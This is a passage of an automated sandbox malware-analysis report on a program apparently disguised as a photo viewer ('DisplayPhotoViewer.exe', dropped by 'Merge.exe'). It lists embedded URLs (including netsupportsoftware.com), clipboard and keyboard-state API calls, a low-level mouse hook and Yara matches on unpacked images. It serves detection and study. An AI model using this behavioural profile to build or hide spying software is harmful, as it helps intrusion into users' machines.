00000006.00000003.2943177680.000000000A75D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951725255.000000000A777000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.netsupportsoftware.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.on2.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.on2.com/vp7.php3
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.on2.com/vp7.php3;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.pbcore.org/PBCore/PBCoreNamespace.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsd
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htm
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pci.co.uk/support
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.pegasusimaging.com/cgi-bin/download2.cgi?LVIDB
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.pegasusimaging.com/cgi-bin/download2.cgi?LVIDB;;;RGB;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.playon.tv/playlater
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.q-team.de
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.q-team.de;;;
                                Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: http://www.r-wipe.comListBox
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;;;;;;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;HE-AAC
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.real.com;LC
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sdcard.org/;SD
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sega.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sega.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2013
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smp
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/2016/PKL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-2/XXXX
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/2013
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/2016
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/2067-3/XXXX
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-7/2006/CPL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-8/2007/PKL
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte-ra.org/schemas/429-9/2007/AM
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.smpte.org/;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sony.com/;Sony
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.sony.com/;Sony/Mobile
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.speex.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.speex.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.streambox.com/products/act-L2_codec.htm
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.streambox.com/products/act-L2_codec.htm;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.org
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.theora.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.twinvq.org/english/index_en.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vmware.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vmware.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vodei.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.volny.cz/aberka/czech/aqt.html;Lossless
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.vorbis.com;;Mode
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.voxware.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.wavpack.com/;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org/;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.webmproject.org;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winnov.com/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winnov.com/;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.xvid.org/Downloads.15.0.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.xvid.org/Downloads.15.0.html;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://xml.apache.org/xalan
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://xmm.sourceforge.net/DivX5-6_Xvid_Bitstream_version.php
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://ad-id.org
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                                Source: Merge.exe, 00000000.00000000.1850845816.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 
00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 
00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://developer.apple.com/library/content/documentation/MusicAudio/Reference/CAFSpec/CAF_overview/
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/Vidvox/hap;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://matroska.org/downloads/windows.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/mediainfoMiXmlGeneralOtherImageFormat_VersionVersion
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_1_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_2_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://mediaarea.net/temp/baseMediaService-V1_3_0.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://raw.githubusercontent.com/WGBH/PBCore_2.1/master/pbcore-2.1.xsd
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://raw.githubusercontent.com/WGBH/PBCore_2.1/master/pbcore-2.1.xsdinstantiationIdentifierP2
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://resolume.com/software/codec;;Version
                                Source: DisplayPhotoViewer.exeString found in binary or memory: https://secure.r-tt.com/UserConsole.shtml
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: https://secure.r-tt.com/UserConsole.shtmlopen
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3625;Lossy
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A84000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3107600843.0000000003F4E000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3107600843.0000000003F84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/D
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/RegisterSecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/SecondaryDisplayPhotoViewer.h
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A3B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/SecondaryDisplayPhotoViewer.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549778994.0000000001132000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.html
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A4B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlP
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopen
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenU
                                Source: DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenU
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3097931052.0000000002A93000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.3delite.hu03
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3255940497.000000006C418000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.3delite.huD
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.blackmagicdesign.com/products/blackmagicraw;LT;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.blackmagicdesign.com/products/blackmagicraw;XQ;;
                                Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drString found in binary or memory: https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:sales
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xiph.org/flac
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://xiph.org/flac/;Lossless
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1101DBD0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101DBD0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11031440 GetClipboardFormatNameA,SetClipboardData,6_2_11031440
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1101DBD0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101DBD0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110311C0 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,6_2_110311C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110076A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,6_2_110076A0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: DirectInput8Creatememstr_725bb51b-d
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B1C4000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: GetRawInputData
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1110BC30 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.b0e0cd9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.ab11758.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.b2f7769.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.DisplayPhotoViewer.exe.111abb38.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.af365a1.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.DisplayPhotoViewer.exe.af365a1.5.unpack, type: UNPACKEDPE
